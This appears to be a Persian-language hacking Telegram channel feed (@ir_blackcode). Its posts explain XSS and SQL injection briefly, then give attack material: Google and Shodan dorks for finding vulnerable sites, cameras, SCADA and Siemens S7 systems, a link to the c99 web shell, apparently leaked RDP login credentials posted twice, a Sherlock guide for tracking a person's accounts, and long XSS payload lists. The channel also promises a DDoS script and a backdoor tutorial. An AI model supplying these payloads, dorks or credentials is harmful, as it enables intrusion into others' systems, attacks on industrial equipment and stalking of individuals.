آسیب پذیری XSS چیه و چند نوع XSS داریم؟


آسیب پذیری XSS یه نوع حمله ای هست که هکر میاد کد های مخرب رو سایت ها تزریق میکنه این حمله خطرناک باعت میشه تا هکر به کوکی ها و اطلاعات مرورگر تارگت دسترسی داشته باشه

انواع باگ XSS

1.XSS Reflected :
تو این نوع باگ xss هکر میاد لینک که توش کد مخرب گذاشته رو برای کاربر میفرسته و وقتی کاربر روی اون لینک کیلیک کنه کد در درخواست
پروتکل HTTP قرار میگیره و سرور دوباره اونو برای کاربر میفرسته

2. Stored XSS :
تو این نوع کد مخرب هکر رو سرور های سایت ذخیره میشه و هربار کاربر روی اون صفحه سایت بیاد کد مخرب اجرا میشه


امیدوارم خوشتون آمده باشه
با ری اکشن بهم انرژی بدید

@ir_blackcode

ری اکشن بزنید

آموزش ها و مطالب جدید در راهه.....

بهترین سیستم های لینوکسی در رتبه بندی مختلف

@ir_blackcode

باگ sql injection چیست؟

باگ sql injection یک باگی هست که هکر میاد
با تزریق sql میاد به دیتابیس سایت دسترسی پیدا میکنه و میتونه تغییر بده
حالا برای پیدا کردن این سایت هایی که آسیب پذیری باگ sql injection دارن باید از دورک های استفاده کنیم بعدن براتون توضیح میدم که
دورک ها چی هستن

چند نوع دورک برای پیدا کردن سایت ها با باگ sql injection


inurl:"id=1"
inurl:"product.php?id="
inurl:"news.php?id="


MRX

ری اشکن یادتون نره
__

@ir_blackcode

۱۰ تا دورک خفن و کاربردی مخصوص Shodan 🖥 برای پیدا کردن تارگت‌های خفن مثل وب‌سایت آسیب‌پذیر، دوربین 📹، ⚙SCADA، و🖥 SSH. اینا کاملاً مخصوص شکار و تحلیل هستن ✅

🔹 1. دوربین‌های IP آسیب‌پذیر📹


webcamXP country:"X"
یا

port:8080 has_screenshot:true title:"IP Camera"

🔹 2. پنل‌های ادمین وب‌سایت 🤒

http.title:"admin login" country:"x"
یا
http.html:"/admin" port:80

🔹 3. سرورهای SSH فعال 🖥🖥

port:22 "OpenSSH" "
یا
"SSH-2.0-OpenSSH_7.4" product:"OpenSSH"

🔹 4. سیستم‌های SCADA و صنعتی⚙⚙

port:502 name:"Modbus"
یا
"ics" port:102 has_screenshot:true

🔹 5. روترهای باز با پورت آسیب‌پذیر 🖥

port:7547 title:"DSL" country:"X"
یا
port:81 title:"Router" country:"X"

🔹 6. صفحه‌های phpMyAdmin بدون رمز 📱🔐

http.title:"phpMyAdmin" country:"x"
یا

"phpMyAdmin" port:80

🔹 7. سرورهایی با بنر اطلاعاتی زیاد 📂

port:22 "Ubuntu" product:"OpenSSH"
یا
"Debian" port:22 ssh

🔹 8. دوربین‌های Hikvision 🖥

title:"Hikvision" port:80

🔹 9. سرورهایی با نسخه خاص و آسیب‌پذیر 🎒

"Apache/2.4.7 (Ubuntu)" port:80
یا
product:"nginx" version:"1.10.3"

🔹 10. تجهیزات صنعتی Siemens S7 ⚙

port:102 "siemens" "S7"



@ir_blackcode

کار با شودان رو بلدید؟

با 👍 یا 👎 جواب بدید

شودان درواقع یه موتور جستجو گر قوی هست و سیستم های آسیب پذیر رو در سراسر دنیا شناسایی میکنه و توی دل خودش جا میده
در بالا تر کانال چند تا دورک شودان گذاشتم
و برای تست نفوذ میتونید از توی شودان تارگت خودتون رو پیدا کنید

//

@ir_blackcode

به طور خلاصه براتون توضیح دادم اگه بیشتر میخواید دربارش بدونید پیشنهاد میکنم از سایت زیرزمین سایبری برید که دوره رایگان و با کیفیتی هست رو ببینید

❤

سلام
دوستان یه شل پیدا کردم خیلی خوبه گفتم براتون بزارم

https://github.com/phpwebshell/c99shell.git



@ir_blackcode

#Free RDP

ip : 183.82.107.50:3388

User : user1

Password : Welcome@123

//


@ir_blackcode

براتون میخوام دوربین مداربسته بزارم
همراه با یوزرنیم و پسورد

به زودی....

@ir_blackcode

لیست دوربین های مداربسته

@ir_blackcode

ری اکشن بزنید ❤👍

یه اسکیریپت دیداس خفن

@ir_blackcode

هنوز خیلی هاتون تو گپ جوین نشدید ها
زود باشید
😂

سعی میکنم براتون ابزار ها و آموزش های پرایوت بیشتر بزارم براتون
و دیگه اون به طریقه استفادتون داره
🙂

چند تا پیلود برای باگ XSS

<script>alert('CLAY')</script>
"><script>alert('CLAY')</script>
'><img src=x onerror=alert('CLAY')>
"><svg/onload=alert('CLAY')>
"><body onload=alert('CLAY')>
"><iframe src="javascript:alert('CLAY')"></iframe>
"><input autofocus onfocus=alert('CLAY')>
"><video><source onerror=alert('CLAY')></video>
"><math><mi//xlink:href="data:x,<script>alert('CLAY')</script>"></math>

#FREE RDP

ip : 183.82.107.50:3388

User : User1
Password : Welcome@123


@ir_blackcode

پیدا کردن تمام شبکه‌های اجتماعی یک شخص خاص 🔍👤

🔮 اگر میخواهید با یک کلیک، تمام شبکه‌های اجتماعی یک شخص خاص که فقط نام کاربری یکی از شبکه‌های اجتماعی آن را دارید را پیدا کنید، در این پست به شما ابزاری معرفی میکنم که میتوانید این کار را انجام دهید! اسم این ابزار شرلوک یا Sherlock است که به آن یک نام کاربری میدهید و تمام شبکه‌های اجتماعی که مربوط به این یوزرنیم هستند را پیدا میکند.

♻️ چگونه این ابزار را نصب کنیم؟!
برای نصب این ابزار در لینوکس دستورات زیر را وارد کنید:
$ git clone https://github.com/sherlock-project/sherlock.git
$ cd sherlock
$ python3 -m pip install -r requirements.txt

♻️ چگونه از این ابزار استفاده کنیم؟!
این ابزار با پایتون نوشته شده است! پس خیلی راحت بنویسید:
$ python3 sherlock username
که به جای username باید نام کاربری مورد نظر خودتان را بنویسید...

@ir_blackcode

فردا براتون اموزش ساخت بک دور رو بهتون آموزش میدم
میتونید روی آپلودر ها آپلود کنید تو یه جایی از سایت و با ترمینال لینوکس دسترسی تون رو حفظ کنید

@ir_blackcode

چند تا پیلود دیگه برای باگ XSS

"-prompt(8)-"
'-prompt(8)-'
";a=prompt,a()//
';a=prompt,a()//
'-eval("window['pro'%2B'mpt'](8)")-'
"-eval("window['pro'%2B'mpt'](8)")-"
"onclick=prompt(8)>"@x.y
"onclick=prompt(8)><svg/onload=prompt(8)>"@x.y
<image/src/onerror=prompt(8)>
<img/src/onerror=prompt(8)>
<image src/onerror=prompt(8)>
<img src/onerror=prompt(8)>
<image src =q onerror=prompt(8)>
<img src =q onerror=prompt(8)>
</scrip</script>t><img src =q onerror=prompt(8)>
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'
"><\x3Cscript>javascript:alert(1)</script>        
'"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
<audio src=1 href=1 onerror="javascript:alert(1)"></audio>
<video src=1 href=1 onerror="javascript:alert(1)"></video>
<body src=1 href=1 onerror="javascript:alert(1)"></body>
<image src=1 href=1 onerror="javascript:alert(1)"></image>
<object src=1 href=1 onerror="javascript:alert(1)"></object>
<script src=1 href=1 onerror="javascript:alert(1)"></script>
<svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize>
<title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange>
<iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad>
<body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter>
<body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus>
<frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll>
<script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange>
<html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp>
<body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange>
<svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad>
<body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide>
<body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver>
<body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload>
<body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad>
<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange>
<html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave>
<html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel>
<style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad>
<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange>
<body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow>
<style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange>
<frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus>
<applet onError applet onError="javascript:javascript:alert(1)"></applet onError>
<marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart>
<script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad>
<html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver>
<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter>

اگه فایل کاملشو میخواید 15 تا ری اکشن بزنید👍


@ir_blackcode